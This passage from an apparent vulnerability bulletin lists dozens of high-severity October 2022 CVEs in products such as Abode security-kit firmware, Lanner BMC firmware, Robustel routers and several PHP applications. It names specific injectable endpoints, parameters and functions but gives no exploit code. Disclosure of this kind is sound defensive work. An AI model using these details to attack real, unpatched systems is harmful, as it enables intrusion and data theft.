goabode — iota_all-in-one_security_kit_firmware A format string injection vulnerability exists in the ghome_process_control_packet functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted XCMD can lead to memory corruption, information disclosure and denial of service. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-33938
MISC
goabode — iota_all-in-one_security_kit_firmware A format string injection vulnerability exists in the XCMD getVarHA functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to memory corruption, information disclosure, and denial of service. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-35244
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities. This vulnerability arises from format string injection via the `ssid` and `ssid_hex` configuration parameters, as used within the `testWifiAP` XCMD handler. 2022-10-25 9.8 CVE-2022-35874
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities. This vulnerability arises from format string injection via the `wpapsk` configuration parameter, as used within the `testWifiAP` XCMD handler. 2022-10-25 9.8 CVE-2022-35875
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities. This vulnerability arises from format string injection via the `default_key_id` and `key` configuration parameters, as used within the `testWifiAP` XCMD handler. 2022-10-25 9.8 CVE-2022-35876
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. Specially-crafted configuration values can lead to memory corruption, information disclosure and denial of service. An attacker can modify a configuration value and then execute an XCMD to trigger these vulnerabilities. This vulnerability arises from format string injection via the `default_key_id` configuration parameter, as used within the `testWifiAP` XCMD handler. 2022-10-25 9.8 CVE-2022-35877
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the web interface /action/iperf functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. 2022-10-25 8.8 CVE-2022-30603
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the web interface /action/ipcamRecordPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. 2022-10-25 8.8 CVE-2022-32586
MISC
goabode — iota_all-in-one_security_kit_firmware An integer overflow vulnerability exists in the web interface /action/ipcamRecordPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to memory corruption. An attacker can make an authenticated HTTP request to trigger this vulnerability. 2022-10-25 8.8 CVE-2022-32775
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities. This vulnerability arises from format string injection via `ST` and `Location` HTTP response headers, as used within the `DoEnumUPnPService` action handler. 2022-10-25 8.8 CVE-2022-35878
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities. This vulnerability arises from format string injection via `controlURL` XML tag, as used within the `DoUpdateUPnPbyService` action handler. 2022-10-25 8.8 CVE-2022-35879
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities. This vulnerability arises from format string injection via `NewInternalClient` XML tag, as used within the `DoUpdateUPnPbyService` action handler. 2022-10-25 8.8 CVE-2022-35880
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the UPnP logging functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted UPnP negotiation can lead to memory corruption, information disclosure, and denial of service. An attacker can host a malicious UPnP service to trigger these vulnerabilities. This vulnerability arises from format string injection via `errorCode` and `errorDescription` XML tags, as used within the `DoUpdateUPnPbyService` action handler. 2022-10-25 8.8 CVE-2022-35881
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability arises from format string injection via the `ssid_hex` HTTP parameter, as used within the `/action/wirelessConnect` handler. 2022-10-25 8.8 CVE-2022-35884
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability arises from format string injection via the `wpapsk_hex` HTTP parameter, as used within the `/action/wirelessConnect` handler. 2022-10-25 8.8 CVE-2022-35885
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability arises from format string injection via the `default_key_id` and `key` HTTP parameters, as used within the `/action/wirelessConnect` handler. 2022-10-25 8.8 CVE-2022-35886
MISC
goabode — iota_all-in-one_security_kit_firmware Four format string injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z and 6.9X. A specially-crafted HTTP request can lead to memory corruption, information disclosure and denial of service. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability arises from format string injection via the `default_key_id` HTTP parameter, as used within the `/action/wirelessConnect` handler. 2022-10-25 8.8 CVE-2022-35887
MISC
goabode — iota_all-in-one_security_kit_firmware An information disclosure vulnerability exists in the XFINDER functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted man-in-the-middle attack can lead to increased privileges. An attacker can perform a man-in-the-middle attack to trigger this vulnerability. 2022-10-25 8.1 CVE-2022-29475
MISC
goabode — iota_all-in-one_security_kit_firmware A denial of service vulnerability exists in the XCMD doDebug functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to denial of service. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 7.5 CVE-2022-32760
MISC
gradle — enterprise A credential-exposure vulnerability in the support-bundle mechanism in Gradle Enterprise 2022.3 through 2022.3.3 allows remote attackers to access a subset of application data (e.g., cleartext credentials). This is fixed in 2022.3.3. 2022-10-21 7.5 CVE-2022-41575
MISC
MISC
hospital_management_system_project — hospital_management_system Hospital Management System v 4.0 is vulnerable to SQL Injection via file:hospital/hms/admin/view-patient.php. 2022-10-28 8.8 CVE-2021-35387
MISC
MISC
iij — iij_smartkey Information disclosure vulnerability in Android App ‘IIJ SmartKey’ versions prior to 2.1.4 allows an attacker to obtain a one-time password issued by the product under certain conditions. 2022-10-24 7.5 CVE-2022-41986
MISC
MISC
jflyfox — jfinal_cms JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/advicefeedback/list 2022-10-26 8.8 CVE-2022-37202
MISC
MISC
jupyter — jupyter_core Jupyter Core is a package for the core common functionality of Jupyter projects. Jupyter Core prior to version 4.11.2 contains an arbitrary code execution vulnerability in `jupyter_core` that stems from `jupyter_core` executing untrusted files in CWD. This vulnerability allows one user to run code as another. Version 4.11.2 contains a patch for this issue. There are no known workarounds. 2022-10-26 8.8 CVE-2022-39286
MISC
CONFIRM
kadencewp — kadence_woocommerce_email_designer The Kadence WooCommerce Email Designer WordPress plugin before 1.5.7 unserialises the content of an imported file, which could lead to PHP object injection issues when an admin imports (intentionally or not) a malicious file and a suitable gadget chain is present on the blog. 2022-10-25 7.2 CVE-2022-3335
CONFIRM
kartverket — github-workflows kartverket/github-workflows are shared reusable workflows for GitHub Actions. Prior to version 2.7.5, all users of the `run-terraform` reusable workflow from the kartverket/github-workflows repo are affected by a code injection vulnerability. A malicious actor could potentially send a PR with a malicious payload leading to execution of arbitrary JavaScript code in the context of the workflow. Users should upgrade to at least version 2.7.5 to resolve the issue. As a workaround, review any pull requests from external users for malicious payloads before allowing them to trigger a build. 2022-10-25 8.8 CVE-2022-39326
CONFIRM
MISC
MISC
keystonejs — keystone @keystone-6/core is a core package for Keystone 6, a content management system for Node.js. Starting with version 2.2.0 and prior to version 2.3.1, users who expected their `multiselect` fields to use the field-level access control – if configured – are vulnerable to their field-level access control not being used. List-level access control is not affected. Field-level access control for fields other than `multiselect` is not affected. Version 2.3.1 contains a fix for this issue. As a workaround, stop using the `multiselect` field. 2022-10-25 9.8 CVE-2022-39322
CONFIRM
MISC
lannerinc — iac-ast2500_firmware Use of hard-coded TLS certificate by default allows an attacker to perform Man-in-the-Middle (MitM) attacks even in the presence of the HTTPS connection. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.00.0. 2022-10-24 8.1 CVE-2021-4228
MISC
lannerinc — iac-ast2500a_firmware Multiple command injection and stack-based buffer overflow vulnerabilities in the SubNet_handler_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 9.8 CVE-2021-26727
MISC
MISC
lannerinc — iac-ast2500a_firmware Command injection and stack-based buffer overflow vulnerabilities in the KillDupUsr_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 9.8 CVE-2021-26728
MISC
MISC
lannerinc — iac-ast2500a_firmware Command injection and multiple stack-based buffer overflow vulnerabilities in the Login_handler_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 9.8 CVE-2021-26729
MISC
MISC
lannerinc — iac-ast2500a_firmware A stack-based buffer overflow vulnerability in a subfunction of the Login_handler_func function of spx_restservice allows an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 9.8 CVE-2021-26730
MISC
MISC
lannerinc — iac-ast2500a_firmware Command injection and multiple stack-based buffer overflow vulnerabilities in the modifyUserb_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 9.8 CVE-2021-26731
MISC
MISC
lannerinc — iac-ast2500a_firmware Session fixation and insufficient session expiration vulnerabilities allow an attacker to perform session hijacking attacks against users. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 9.8 CVE-2021-46279
MISC
MISC
lannerinc — iac-ast2500a_firmware A broken access control vulnerability in the FirstReset_handler_func function of spx_restservice allows an attacker to arbitrarily send reboot commands to the BMC, causing a Denial-of-Service (DoS) condition. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 7.5 CVE-2021-26733
MISC
MISC
lannerinc — iac-ast2500a_firmware A broken access control vulnerability in the KillDupUsr_func function of spx_restservice allows an attacker to arbitrarily terminate active sessions of other users, causing a Denial-of-Service (DoS) condition. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 7.5 CVE-2021-44467
MISC
MISC
lannerinc — iac-ast2500a_firmware An improper input validation vulnerability in the TLS certificate generation function allows an attacker to cause a Denial-of-Service (DoS) condition which can only be reverted via a factory reset. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 7.5 CVE-2021-44769
MISC
MISC
libexpat_project — libexpat In libexpat through 2.4.9, there is a use-after-free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations. 2022-10-24 7.5 CVE-2022-43680
MISC
MISC
MISC
MLIST
DEBIAN
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992. 2022-10-21 9.8 CVE-2022-3649
N/A
N/A
linux — linux_kernel A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944. 2022-10-21 8.8 CVE-2022-3640
MISC
MISC
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability. 2022-10-21 7.8 CVE-2022-3625
N/A
N/A
linux — linux_kernel A vulnerability, which was classified as critical, was found in Linux Kernel. This affects the function __mtk_ppe_check_skb of the file drivers/net/ethernet/mediatek/mtk_ppe.c of the component Ethernet Handler. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211935. 2022-10-21 7.8 CVE-2022-3636
N/A
N/A
linux — linux_kernel drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor’s internal memory. 2022-10-26 7.8 CVE-2022-43750
MISC
MISC
MISC
MISC
linux — linux_kernel A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function tst_timer of the file drivers/atm/idt77252.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. VDB-211934 is the identifier assigned to this vulnerability. 2022-10-21 7 CVE-2022-3635
N/A
N/A
litespeedtech — openlitespeed Improper Input Validation vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Command Injection. This affects 1.7.0 versions before 1.7.16.1. 2022-10-27 8.8 CVE-2022-0073
MISC
MISC
litespeedtech — openlitespeed Untrusted Search Path vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Container allows Privilege Escalation. This affects versions from 1.6.15 before 1.7.16.1. 2022-10-27 8.8 CVE-2022-0074
MISC
metabase — metabase Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, H2 (Sample Database) could allow Remote Code Execution (RCE), which can be abused by users able to write SQL queries on H2 databases. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase no longer allows DDL statements in H2 native queries. 2022-10-26 8.8 CVE-2022-39361
CONFIRM
metabase — metabase Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, unsaved SQL queries are auto-executed, which could pose a possible attack vector. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase no longer automatically executes ad-hoc native queries. Now the native editor shows the query and gives the user the option to manually run the query if they want. 2022-10-26 8.8 CVE-2022-39362
MISC
CONFIRM
microsoft — azure_command-line_interface Azure CLI is the command-line interface for Microsoft Azure. In versions previous to 2.40.0, Azure CLI contains a vulnerability for potential code injection. Critical scenarios are where a hosting machine runs an Azure CLI command where parameter values have been provided by an external source. The vulnerability is only applicable when the Azure CLI command is run on a Windows machine and with any version of PowerShell and when the parameter value contains the `&` or `|` symbols. If any of these prerequisites are not met, this vulnerability is not applicable. Users should upgrade to version 2.40.0 or greater to receive a mitigation for the vulnerability. 2022-10-25 9.8 CVE-2022-39327
CONFIRM
MISC
MISC
mitel — micollab A vulnerability in the MiCollab Client server component of Mitel MiCollab through 9.5.0.101 could allow an authenticated attacker to conduct a Server-Side Request Forgery (SSRF) attack due to insufficient restriction of URL parameters. A successful exploit could allow an attacker to leverage connections and permissions available to the host server. 2022-10-25 8.8 CVE-2022-36451
MISC
MISC
mitel — micollab A vulnerability in the MiCollab Client API of Mitel MiCollab 9.1.3 through 9.5.0.101 could allow an authenticated attacker to modify their profile parameters due to improper authorization controls. A successful exploit could allow the authenticated attacker to control another extension number. 2022-10-25 8.8 CVE-2022-36453
MISC
MISC
octopus — octopus_server In affected versions of Octopus Server it is possible for a session token to be valid indefinitely due to improper validation of the session token parameters. 2022-10-27 9.1 CVE-2022-2782
MISC
online_medicine_ordering_system_project — online_medicine_ordering_system A vulnerability classified as critical has been found in SourceCodester Online Medicine Ordering System 1.0. Affected is an unknown function of the file admin/?page=orders/view_order. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. VDB-212346 is the identifier assigned to this vulnerability. 2022-10-27 9.8 CVE-2022-3714
MISC
online_pet_shop_we_app_project — online_pet_shop_we_app Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the User module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point. 2022-10-27 7.2 CVE-2022-39977
MISC
online_pet_shop_we_app_project — online_pet_shop_we_app Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the Product List module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point. 2022-10-27 7.2 CVE-2022-39978
MISC
open-xchange — ox_app_suite documentconverter in OX App Suite through 7.10.6, in a non-default configuration with ghostscript, allows OS Command Injection because file conversion may occur for an EPS document that is disguised as a PDF document. 2022-10-25 9.8 CVE-2022-29851
MISC
openfga — openfga OpenFGA is an authorization/permission engine. Versions prior to version 0.2.4 are vulnerable to authorization bypass under certain conditions. Users who have wildcard (`*`) defined on tupleset relations in their authorization model are vulnerable. Version 0.2.4 contains a patch for this issue. 2022-10-25 9.8 CVE-2022-39341
CONFIRM
MISC
MISC
openfga — openfga OpenFGA is an authorization/permission engine. Versions prior to version 0.2.4 are vulnerable to authorization bypass under certain conditions. Users whose model has a relation defined as a tupleset (the right hand side of a ‘from’ statement) that involves anything other than a direct relationship (e.g. ‘as self’) are vulnerable. Version 0.2.4 contains a patch for this issue. 2022-10-25 9.8 CVE-2022-39342
CONFIRM
MISC
MISC
opensuse — factory An Improper Link Resolution Before File Access (‘Link Following’) vulnerability in a script called by the sendmail systemd service of openSUSE Factory allows local attackers to escalate from user mail to root. This issue affects: SUSE openSUSE Factory sendmail versions prior to 8.17.1-1.1. 2022-10-26 7.8 CVE-2022-31256
CONFIRM
oxilab — accordions Auth. WordPress Options Change (siteurl, users_can_register, default_role, admin_email and new_admin_email) vulnerability in Biplob Adhikari’s Accordions – Multiple Accordions or FAQs Builder plugin (versions <= 2.0.3) on WordPress. 2022-10-21 7.2 CVE-2022-38104
CONFIRM
CONFIRM
parseplatform — parse-server Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Versions prior to 4.10.17, and prior to 5.2.8 on the 5.x branch, crash when a file download request is received with an invalid byte range, resulting in a Denial of Service. This issue has been patched in versions 4.10.17, and 5.2.8. There are no known workarounds. 2022-10-24 7.5 CVE-2022-39313
CONFIRM
pikepdf_project — pikepdf pikepdf before 2.10.0 allows an XXE attack against PDF XMP metadata parsing. 2022-10-24 9.8 CVE-2021-46849
MISC
MISC
redis — redis A vulnerability, which was classified as problematic, was found in Redis. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The name of the patch is 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability. 2022-10-21 7.5 CVE-2022-3647
N/A
N/A
robustel — r1510_firmware An OS command injection vulnerability exists in the sysupgrade command injection functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-32765
MISC
robustel — r1510_firmware An OS command injection vulnerability exists in the js_package install functionality of Robustel R1510 3.1.16. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-33150
MISC
robustel — r1510_firmware A directory traversal vulnerability exists in the web_server /ajax/remove/ functionality of Robustel R1510 3.1.16. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability. 2022-10-25 9.1 CVE-2022-33897
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability. The `/action/import_authorized_keys/` API is affected by a command injection vulnerability. 2022-10-25 7.5 CVE-2022-35261
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability. The `/action/import_xml_file/` API is affected by a command injection vulnerability. 2022-10-25 7.5 CVE-2022-35262
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_file/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35263
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_aaa_cert_file/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35264
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_nodejs_app/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35265
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_firmware/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35266
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_https_cert_file/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35267
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_sdk_file/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35268
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_e2c_json_file/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35269
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_wireguard_cert_file/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35270
MISC
robustel — r1510_firmware A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.The `/action/import_cert_file/` API is affected by command injection vulnerability. 2022-10-25 7.5 CVE-2022-35271
MISC
robustel — r1510_firmware An OS command injection vulnerability exists in the web_server /action/import_authorized_keys/ functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability. 2022-10-25 7.2 CVE-2022-34850
MISC
sanitization_management_system_project — sanitization_management_system A vulnerability has been found in SourceCodester Sanitization Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to missing authentication. The attack can be launched remotely. The identifier VDB-212017 was assigned to this vulnerability. 2022-10-26 9.8 CVE-2022-3674
N/A
school_activity_updates_with_sms_notification_project — school_activity_updates_with_sms_notification School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /modules/announcement/index.php?view=edit&id=. 2022-10-27 9.8 CVE-2022-39976
MISC
sem-cms — semcms SEMCMS v 1.2 is vulnerable to SQL Injection via SEMCMS_User.php. 2022-10-28 9.8 CVE-2021-38217
MISC
sem-cms — semcms SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Plist.php. 2022-10-28 9.8 CVE-2021-38729
MISC
MISC
sem-cms — semcms SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Info.php. 2022-10-28 9.8 CVE-2021-38730
MISC
MISC
sem-cms — semcms SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Zekou.php. 2022-10-28 9.8 CVE-2021-38731
MISC
MISC
sem-cms — semcms SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Message.php. 2022-10-28 9.8 CVE-2021-38732
MISC
MISC
sem-cms — semcms SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_BlogCat.php. 2022-10-28 9.8 CVE-2021-38733
MISC
MISC
sem-cms — semcms SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Menu.php. 2022-10-28 9.8 CVE-2021-38734
MISC
MISC
sem-cms — semcms SEMCMS Shop V 1.1 is vulnerable to SQL Injection via Ant_Global.php. 2022-10-28 9.8 CVE-2021-38736
MISC
MISC
sem-cms — semcms SEMCMS v 1.1 is vulnerable to SQL Injection via Ant_Pro.php. 2022-10-28 9.8 CVE-2021-38737
MISC
MISC
shescape_project — shescape Versions of the package shescape from 1.5.10 and before 1.6.1 are vulnerable to Regular Expression Denial of Service (ReDoS) via the escape function in index.js, due to the usage of insecure regex in the escapeArgBash function. 2022-10-27 7.5 CVE-2022-25918
MISC
MISC
MISC
MISC
siemens — siveillance_video_mobile_server A vulnerability has been identified in Siveillance Video Mobile Server V2022 R2 (All versions < V22.2a (80)). The mobile server component of affected applications improperly handles the log in for Active Directory accounts that are part of Administrators group. This could allow an unauthenticated remote attacker to access the application without a valid account. 2022-10-21 9.8 CVE-2022-43400
MISC
simple_cold_storage_management_system_project — simple_cold_storage_managment_system Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /bookings/update_status.php. 2022-10-28 7.2 CVE-2022-43229
MISC
simple_cold_storage_management_system_project — simple_cold_storage_managment_system Simple Cold Storage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=bookings/view_details. 2022-10-28 7.2 CVE-2022-43230
MISC
socket — socket.io-parser Due to improper type validation in attachment parsing in the Socket.io js library, it is possible to overwrite the _placeholder object, which allows an attacker to place references to functions at arbitrary places in the resulting query object. 2022-10-26 9.8 CVE-2022-2421
CONFIRM
CONFIRM
soflyy — wp_all_export The WP All Export Pro WordPress plugin before 1.7.9 uses the contents of the cc_sql POST parameter directly as a database query, allowing users who have been given permission to run exports to execute arbitrary SQL statements, leading to a SQL Injection vulnerability. By default only users with the Administrator role can perform exports, but this can be delegated to lower privileged users as well. 2022-10-25 8.8 CVE-2022-3395
CONFIRM
soflyy — wp_all_export The WP All Export Pro WordPress plugin before 1.7.9 does not limit some functionality during exports only to users with the Administrator role, allowing any logged in user who has been given privileges to perform exports to execute arbitrary code on the site. By default only administrators can run exports, but the privilege can be delegated to lower privileged users. 2022-10-25 7.2 CVE-2022-3394
CONFIRM
softmotions — iowow IOWOW is a C utility library and persistent key/value storage engine. Versions 1.4.15 and prior contain a stack buffer overflow vulnerability that allows for Denial of Service (DOS) when it parses scientific notation numbers present in JSON. A patch for this issue is available at commit a79d31e4cff1d5a08f665574b29fd885897a28fd in the `master` branch of the repository. There are no workarounds other than applying the patch. 2022-10-21 7.5 CVE-2022-23462
CONFIRM
MISC
